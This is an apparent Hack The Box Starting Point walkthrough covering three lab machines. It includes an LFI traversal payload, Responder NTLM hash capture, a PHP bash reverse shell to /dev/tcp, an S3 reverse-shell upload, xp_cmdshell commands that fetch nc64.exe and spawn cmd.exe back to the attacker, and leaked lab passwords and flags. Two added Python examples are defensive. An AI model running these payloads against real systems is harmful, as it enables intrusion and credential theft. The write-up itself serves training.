Start_Point

HTB's Very Easy boxes, used to get familiar with the basic operation of Hack The Box and the basic setup around its machines, and to fill in some foundational knowledge.

Start Point

Web_Nmap_smb

redis_cli

How to install redis-cli? It can be installed with sudo apt-get install redis-tools, which contains redis-cli. After connecting to the Redis server, INFO gives us information about the database. Besides that, keys * lists all keys and get 'key' returns the value of a key.

┌──(kali㉿kali)-[/usr]
└─$ redis-cli -h
redis-cli 7.0.11

Usage: redis-cli [OPTIONS] [cmd [arg [arg ...]]]
-h <hostname> Server hostname (default: 127.0.0.1).
-p <port> Server port (default: 6379).
-s <socket> Server socket (overrides hostname and port).
-a <password> Password to use when connecting to the server.
You can also use the REDISCLI_AUTH environment
variable to pass this password more safely
(if both are used, this argument takes precedence).
--user <username> Used to send ACL style 'AUTH username pass'. Needs -a.
--pass <password> Alias of -a for consistency with the new --user option.
--askpass Force user to input password with mask from STDIN.
If this argument is used, '-a' and REDISCLI_AUTH
environment variable will be ignored.
-u <uri> Server URI.
-r <repeat> Execute specified command N times.
-i <interval> When -r is used, waits <interval> seconds per command.
It is possible to specify sub-second times like -i 0.1.
This interval is also used in --scan and --stat per cycle.
and in --bigkeys, --memkeys, and --hotkeys per 100 cycles.
-n <db> Database number.
-2 Start session in RESP2 protocol mode.
-3 Start session in RESP3 protocol mode.
-x Read last argument from STDIN (see example below).
-X Read <tag> argument from STDIN (see example below).
-d <delimiter> Delimiter between response bulks for raw formatting (default: \n).
-D <delimiter> Delimiter between responses for raw formatting (default: \n).
-c Enable cluster mode (follow -ASK and -MOVED redirections).
-e Return exit error code when command execution fails.
--tls Establish a secure TLS connection.
--sni <host> Server name indication for TLS.
--cacert <file> CA Certificate file to verify with.
--cacertdir <dir> Directory where trusted CA certificates are stored.
If neither cacert nor cacertdir are specified, the default
system-wide trusted root certs configuration will apply.
--insecure Allow insecure TLS connection by skipping cert validation.
--cert <file> Client certificate to authenticate with.
--key <file> Private key file to authenticate with.
--tls-ciphers <list> Sets the list of preferred ciphers (TLSv1.2 and below)
in order of preference from highest to lowest separated by colon (":").
See the ciphers(1ssl) manpage for more information about the syntax of this string.
--tls-ciphersuites <list> Sets the list of preferred ciphersuites (TLSv1.3)
in order of preference from highest to lowest separated by colon (":").
See the ciphers(1ssl) manpage for more information about the syntax of this string,
and specifically for TLSv1.3 ciphersuites.
--raw Use raw formatting for replies (default when STDOUT is
not a tty).
--no-raw Force formatted output even when STDOUT is not a tty.
--quoted-input Force input to be handled as quoted strings.
--csv Output in CSV format.
--json Output in JSON format (default RESP3, use -2 if you want to use with RESP2).
--quoted-json Same as --json, but produce ASCII-safe quoted strings, not Unicode.
--show-pushes <yn> Whether to print RESP3 PUSH messages. Enabled by default when
STDOUT is a tty but can be overridden with --show-pushes no.
--stat Print rolling stats about server: mem, clients, ...
--latency Enter a special mode continuously sampling latency.
If you use this mode in an interactive session it runs
forever displaying real-time stats. Otherwise if --raw or
--csv is specified, or if you redirect the output to a non
TTY, it samples the latency for 1 second (you can use
-i to change the interval), then produces a single output
and exits.
--latency-history Like --latency but tracking latency changes over time.
Default time interval is 15 sec. Change it using -i.
--latency-dist Shows latency as a spectrum, requires xterm 256 colors.
Default time interval is 1 sec. Change it using -i.
--lru-test <keys> Simulate a cache workload with an 80-20 distribution.
--replica Simulate a replica showing commands received from the master.
--rdb <filename> Transfer an RDB dump from remote server to local file.
Use filename of "-" to write to stdout.
--functions-rdb <filename> Like --rdb but only get the functions (not the keys)
when getting the RDB dump file.
--pipe Transfer raw Redis protocol from stdin to server.
--pipe-timeout <n> In --pipe mode, abort with error if after sending all data.
no reply is received within <n> seconds.
Default timeout: 30. Use 0 to wait forever.
--bigkeys Sample Redis keys looking for keys with many elements (complexity).
--memkeys Sample Redis keys looking for keys consuming a lot of memory.
--memkeys-samples <n> Sample Redis keys looking for keys consuming a lot of memory.
And define number of key elements to sample
--hotkeys Sample Redis keys looking for hot keys.
only works when maxmemory-policy is *lfu.
--scan List all keys using the SCAN command.
--pattern <pat> Keys pattern when using the --scan, --bigkeys or --hotkeys
options (default: *).
--quoted-pattern <pat> Same as --pattern, but the specified string can be
quoted, in order to pass an otherwise non binary-safe string.
--intrinsic-latency <sec> Run a test to measure intrinsic system latency.
The test will run for the specified amount of seconds.
--eval <file> Send an EVAL command using the Lua script at <file>.
--ldb Used with --eval enable the Redis Lua debugger.
--ldb-sync-mode Like --ldb but uses the synchronous Lua debugger, in
this mode the server is blocked and script changes are
not rolled back from the server memory.
--cluster <command> [args...] [opts...]
Cluster Manager command and arguments (see below).
--verbose Verbose mode.
--no-auth-warning Don't show warning message when using password on command
line interface.
--help Output this help and exit.
--version Output version and exit.

Cluster Manager Commands:
Use --cluster help to list all available cluster manager commands.

Examples:
cat /etc/passwd | redis-cli -x set mypasswd
redis-cli -D "" --raw dump key > key.dump && redis-cli -X dump_tag restore key2 0 dump_tag replace < key.dump
redis-cli -r 100 lpush mylist x
redis-cli -r 100 -i 1 info | grep used_memory_human:
redis-cli --quoted-input set '"null-\x00-separated"' value
redis-cli --eval myscript.lua key1 key2 , arg1 arg2 arg3
redis-cli --scan --pattern '*:12345*'

(Note: when using --eval the comma separates KEYS[] from ARGV[] items)

When no command is given, redis-cli starts in interactive mode.
Type "help" in interactive mode for information on available commands
and settings.

Responder

Information gathering

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.237.187
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 03:00 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.32% done; ETC: 03:00 (0:00:10 remaining)
Nmap scan report for unika.htb (10.129.237.187)
Host is up (0.20s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
7680/tcp open pando-pub

Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p80,5985,7680 10.129.237.187
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 03:02 EDT
Nmap scan report for unika.htb (10.129.237.187)
Host is up (0.067s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Unika
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.15 seconds

Windows Remote Management (WinRM, which runs on port 5985 by default) is a remote management protocol built into Windows; it essentially uses the Simple Object Access Protocol to interact with remote computers and servers, as well as with operating systems and applications.

In the browser, visiting the IP redirects to unika.htb, so we add the IP-to-unika.htb mapping to /etc/hosts so that the unika.htb page can be opened directly. Most of the page consists of anchor links; at the language-switching link we notice the URL discussed next.

Web exploitation

Seeing this URL, we should consider whether local and remote file inclusion vulnerabilities exist, so we construct ../../../../../../../../windows/system32/drivers/etc/hosts as the value of the page parameter.

A local file inclusion vulnerability does exist. Next we test for remote file inclusion; since the nmap scan already told us this is a Windows machine, we will use Responder to capture the NTLM value.

In the PHP configuration file php.ini:
allow_url_include is set to Off by default, so PHP does not load remote HTTP or FTP URLs, which prevents remote file inclusion attacks.
However, even when allow_url_include and allow_url_fopen are both Off, PHP does not stop the loading of SMB URLs.
We can misuse this behaviour to steal an NTLM hash.
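The page parameter above is handed straight to include, which is why both the ../ traversal and, as the php.ini note explains, an SMB path are accepted. As an added example that is not code from the box or from the post, here is the check in Python that a page switch like this should perform: resolve the request against an allowlist and the web root, and reject traversal, absolute paths, UNC paths and URL wrappers before anything is opened. The web root and the allowed page names are constructed.

```python
"""Guarding a file-include parameter such as ?page=... against local and
remote inclusion. Added example for this writeup; paths are constructed."""
import posixpath
import re

WEB_ROOT = "/var/www/html"                                      # constructed web root
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}  # constructed allowlist

# Anything that looks like a scheme (http://, ftp://, smb://, php://, data:) or a UNC path.
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")
UNC_RE = re.compile(r"^(\\\\|//)")


class IncludeRejected(ValueError):
    pass


def resolve_page(requested: str) -> str:
    """Return the absolute path to include, or raise IncludeRejected.

    Two independent defences: an allowlist (the real fix for a page switch
    with a handful of values) and a canonical-path check that would still
    stop traversal if the allowlist were ever widened to a directory."""
    if not requested or "\x00" in requested:
        raise IncludeRejected("empty or NUL in page name")
    if SCHEME_RE.match(requested) or UNC_RE.match(requested):
        # Stops http://, ftp://, smb://, php://filter and \\host\share alike,
        # independent of allow_url_include / allow_url_fopen, so the server
        # never initiates an outbound SMB (NTLM) authentication.
        raise IncludeRejected("remote or wrapper include: %r" % requested)
    normalized = requested.replace("\\", "/")      # Windows hosts accept both separators
    if normalized.startswith("/") or ".." in normalized.split("/"):
        raise IncludeRejected("absolute path or traversal: %r" % requested)
    if normalized not in ALLOWED_PAGES:
        raise IncludeRejected("not an allowed page: %r" % requested)
    full = posixpath.normpath(posixpath.join(WEB_ROOT, normalized))
    if not full.startswith(WEB_ROOT + "/"):        # belt-and-braces canonical check
        raise IncludeRejected("escaped web root: %r" % requested)
    return full


def classify(requested: str) -> str:
    """'ok' or the rejection reason; handy when reviewing access logs for page= values."""
    try:
        resolve_page(requested)
        return "ok"
    except IncludeRejected as exc:
        return str(exc).split(":")[0]


if __name__ == "__main__":
    for value in ("french.html",
                  "../../../../../../../../windows/system32/drivers/etc/hosts",
                  "//files.example.invalid/share/x.php"):
        print(value, "->", classify(value))
```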

Responder can carry out many different kinds of attack, but for this scenario it will be set up as a malicious SMB server.
When the target machine attempts NTLM authentication against that server, Responder sends it a challenge to be encrypted with the user's password. When it responds, Responder uses the challenge and the encrypted response to produce the NetNTLMv2 (a NetNTLMv2 challenge/response is a specially formatted string that contains both the challenge and the response). Although we cannot reverse NetNTLMv2, we can try many common passwords to see whether any of them produces the same challenge response; if one does, we know that is the password. This is usually called hash cracking, and we will do it with a program named "John The Ripper".

Responder captures the password hash from the NTLM authentication

./Responder.py -I tun0

Next, copy the captured output and crack it with john

Finally, connect with evil-winrm

evil-winrm -i IP -u administrator -p badminton

The flag is found on mike's desktop

Three

Three is a Linux box that includes a website, which utilizes an AWS S3 bucket as its cloud-storage device. We can exploit this poorly configured S3 bucket and upload a reverse shell on it. We can then visit the corresponding URL to execute the reverse file and ultimately retrieve the flag.

Basic information gathering shows an email address in the CONTACT section whose domain is thetoppers.htb, so we write the thetoppers.htb-to-IP mapping into the hosts file.

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.227.248
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 22:00 EDT
Warning: 10.129.227.248 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.227.248
Host is up (0.020s latency).
Not shown: 65284 closed tcp ports (reset), 249 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 23.96 seconds

Try subdomain brute-forcing

┌──(i3eg1nner㉿minilite)-[~]
└─$ wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u thetoppers.htb -H "Host:FUZZ.thetoppers.htb" --hw 1036
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://thetoppers.htb/
Total requests: 5000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000247: 404 0 L 2 W 21 Ch "s3"
000000690: 400 10 L 35 W 306 Ch "gc._msdcs"
000002700: 400 10 L 35 W 306 Ch "m."
000002795: 400 10 L 35 W 306 Ch "ns2.cl.bellsouth.net."
000002883: 400 10 L 35 W 306 Ch "ns1.viviotech.net."
000002885: 400 10 L 35 W 306 Ch "ns2.viviotech.net."
000003050: 400 10 L 35 W 306 Ch "ns3.cl.bellsouth.net."
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 3066
Filtered Requests: 3059
Requests/sec.: 0

We get an s3 subdomain. Although it returned 404, it still deserves attention: a Google search shows that s3 is Amazon's storage service, so we also write the s3.thetoppers.htb-to-IP mapping into the hosts file.

┌──(i3eg1nner㉿minilite)-[~]
└─$ curl s3.thetoppers.htb
{"status": "running"}

Next we need the awscli tool to interact with s3.thetoppers.htb. After installing awscli (or aws) with apt-get, first run aws configure to set the parameters (any values will do); only then can we interact with the target.

Use aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb to list all stored objects

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws s3 cp hash s3://s3.thetoppers.htb/
upload failed: ./hash to s3://s3.thetoppers.htb/hash Could not connect to the endpoint URL: "https://s3.temp.amazonaws.com/s3.thetoppers.htb/hash"

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
PRE images/
2023-06-01 22:17:08 0 .htaccess
2023-06-01 22:17:08 11952 index.php

Given that, we next use the cp command to upload a file through the aws s3 mechanism. At first I uploaded this reverse shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>

But there was a problem: the connection dropped immediately after connecting, so let's try the classic PHP reverse shell instead

┌──(i3eg1nner㉿minilite)-[~]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php ./

┌──(i3eg1nner㉿minilite)-[~]
└─$ vim php-reverse-shell.php
┌──(i3eg1nner㉿minilite)-[~]
└─$ aws --endpoint=http://s3.thetoppers.htb s3 cp php-reverse-shell.php s3://thetoppers.htb
upload: ./php-reverse-shell.php to s3://thetoppers.htb/php-reverse-shell.php

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
PRE images/
2023-06-01 22:17:08 0 .htaccess
2023-06-01 22:17:08 11952 index.php
2023-06-01 23:32:09 5494 php-reverse-shell.php
2023-06-01 23:19:09 31 shell.php
2023-06-01 23:27:06 80 shellre.php

Requesting it with curl, the reverse shell succeeds; after some simple enumeration, flag.txt is found in the www directory

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.227.248] 38080
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
03:32:52 up 1:33, 0 users, load average: 0.00, 0.00, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@three:/$ uname -a
uname -a
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
www-data@three:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:ac:02 brd ff:ff:ff:ff:ff:ff
inet 10.129.227.248/16 brd 10.129.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:ac02/64 scope global dynamic mngtmpaddr
valid_lft 86391sec preferred_lft 14391sec
inet6 fe80::250:56ff:feb9:ac02/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:2d:2f:a4:be brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-2de548fc06bf: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:f6:13:a4:fd brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-2de548fc06bf
valid_lft forever preferred_lft forever
inet6 fe80::42:f6ff:fe13:a4fd/64 scope link
valid_lft forever preferred_lft forever
6: veth1c9ddaf@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2de548fc06bf state UP group default
link/ether 8e:19:6f:3f:9d:5f brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::8c19:6fff:fe3f:9d5f/64 scope link
valid_lft forever preferred_lft forever
www-data@three:/$ pwd
pwd
/
www-data@three:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@three:/$ cd /root
cd /root
bash: cd: /root: Permission denied
www-data@three:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@three:/$ cd /var/www
cd /var/www
www-data@three:/var/www$ ls
ls
flag.txt html
www-data@three:/var/www$ cat flag.txt
cat flag.txt
a980d99281a28d638ac68b9bf9453c2b

Archetype

Information gathering

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.142.66
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 04:06 EDT
Warning: 10.129.142.66 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.66
Host is up (0.031s latency).
Not shown: 65135 closed tcp ports (reset), 388 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown

SMB enumeration

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 10.129.142.66
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 04:09 EDT
Nmap scan report for 10.129.142.66
Host is up (0.0094s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.129.142.66\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.142.66\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.142.66\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.129.142.66\backups:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: READ
|_ Current user access: READ

Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds

SMB login

┌──(i3eg1nner㉿minilite)-[~]
└─$ smbclient //10.129.142.66/backups
Password for [WORKGROUP\i3eg1nner]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020

5056511 blocks of size 4096. 2609591 blocks available
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (35.0 KiloBytes/sec) (average 35.0 KiloBytes/sec)
┌──(i3eg1nner㉿minilite)-[~]
└─$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>

MSSQL exploitation

We found a username and password, the username contains the keyword sql, and the port scan shows that MSSQL is running on the target. So we try to log in, using impacket-mssqlclient

┌──(i3eg1nner㉿minilite)-[~]
└─$ impacket-mssqlclient -windows-auth sql_svc@10.129.142.66
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

Use the following query to check

SELECT is_srvrolemember('sysadmin');

It does have the privilege; next we obtain command execution

EXEC xp_cmdshell 'net user'; -- priv
-- On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv

You can also use the tool's built-in commands (enable_xp_cmdshell), which give some guidance

Now we can run commands through xp_cmdshell, so we consider how to get a reverse shell: first upload nc.exe to the machine, then use nc to spawn the shell.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 443"
┌──(i3eg1nner㉿minilite)-[/usr/share/windows-resources/binaries]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.142.66] 49677
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F

Directory of C:\Users\sql_svc\Downloads

06/02/2023 01:48 AM <DIR> .
06/02/2023 01:48 AM <DIR> ..
06/02/2023 01:45 AM 59,392 nc.exe
06/02/2023 01:48 AM 59,392 nc64.exe
2 File(s) 118,784 bytes
2 Dir(s) 10,717,417,472 bytes free

C:\Users\sql_svc\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F

Directory of C:\Users\sql_svc\Desktop

01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 10,717,413,376 bytes free

C:\Users\sql_svc\Desktop>type user.txt

Looking at the PowerShell history file (flagged in the winPEAS output below), we find a username and password

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Default\NTUSER.DAT
C:\Users\sql_svc\NTUSER.DAT

Analyzing Other Windows Files Files (limit 70)

/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/

PS C:\Users\sql_svc\Downloads> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
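Both credentials on this box came from plaintext files readable by a low-privileged account: the connection string in prod.dtsConfig on the backups share and the net use line in ConsoleHost_history.txt. As an added example that is not part of the original writeup, here is a Python scanner for exactly those two sources, the sort of check a defender can run across file shares and user profiles. The sample file contents are constructed to mirror the files shown above, with placeholder secrets.

```python
"""Find plaintext credentials in SSIS DTSConfig files and PSReadLine history.
Added example for this writeup; the sample inputs below are constructed."""
import re
import xml.etree.ElementTree as ET

# Connection-string keys that carry a secret (keys are case-insensitive in OLE DB/ODBC).
SECRET_KEYS = ("password", "pwd")
# `net use <drive> \\server\share [password] /user:<name> [password]` and similar.
NET_USE_RE = re.compile(
    r"^\s*net(?:\.exe)?\s+use\s+(?P<target>\S+)\s+\\\\(?P<share>\S+)(?P<rest>.*)$",
    re.IGNORECASE,
)
USER_RE = re.compile(r"/user:(?P<user>\S+)", re.IGNORECASE)


def parse_connection_string(conn: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    pairs = {}
    for part in conn.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs


def scan_dtsconfig(xml_text: str) -> list:
    """Return (path, user, password) for every <ConfiguredValue> that holds a
    connection string with a Password/Pwd key."""
    findings = []
    root = ET.fromstring(xml_text)
    for cfg in root.iter("Configuration"):
        path = cfg.get("Path", "")
        value = cfg.findtext("ConfiguredValue") or ""
        if "ConnectionString" not in path and "=" not in value:
            continue
        pairs = parse_connection_string(value)
        for key in SECRET_KEYS:
            if pairs.get(key):
                user = pairs.get("user id", pairs.get("uid", ""))
                findings.append((path, user, pairs[key]))
    return findings


def scan_ps_history(history_text: str) -> list:
    """Return (share, user, password) for net use lines that embed a password."""
    findings = []
    for line in history_text.splitlines():
        match = NET_USE_RE.match(line)
        if not match:
            continue
        rest = match.group("rest")
        user_match = USER_RE.search(rest)
        if not user_match:
            continue
        # Whatever is left besides /switches is the password; net use accepts it
        # either before or after /user:, so take the last bare token.
        tokens = [t for t in rest.split() if not t.startswith("/")]
        if tokens:
            findings.append((match.group("share"), user_match.group("user"), tokens[-1]))
    return findings


# Constructed samples modelled on the files found on the box (placeholder secrets).
SAMPLE_DTSCONFIG = """<DTSConfiguration>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=PLACEHOLDER_sql_pw;User ID=EXAMPLE\\sql_svc;Initial Catalog=Catalog;Persist Security Info=True;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""

SAMPLE_HISTORY = """Get-ChildItem C:\\Users
net.exe use T: \\\\example-host\\backups /user:administrator PLACEHOLDER_admin_pw
net use T: /delete
"""


if __name__ == "__main__":
    print(scan_dtsconfig(SAMPLE_DTSCONFIG))
    print(scan_ps_history(SAMPLE_HISTORY))
```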

Finally, connect as administrator with impacket-psexec

┌──(i3eg1nner㉿minilite)-[~/tools/windows]
└─$ impacket-psexec administrator@10.129.142.66
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.142.66.....
[*] Found writable share ADMIN$
[*] Uploading file baWlxTKg.exe
[*] Opening SVCManager on 10.129.142.66.....
[*] Creating service Waku on 10.129.142.66.....
[*] Starting service Waku.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop> dir Volume in drive C has no label.
Volume Serial Number is 9565-0B4F

Directory of C:\Users\Administrator\Desktop

07/27/2021 02:30 AM <DIR> .
07/27/2021 02:30 AM <DIR> ..
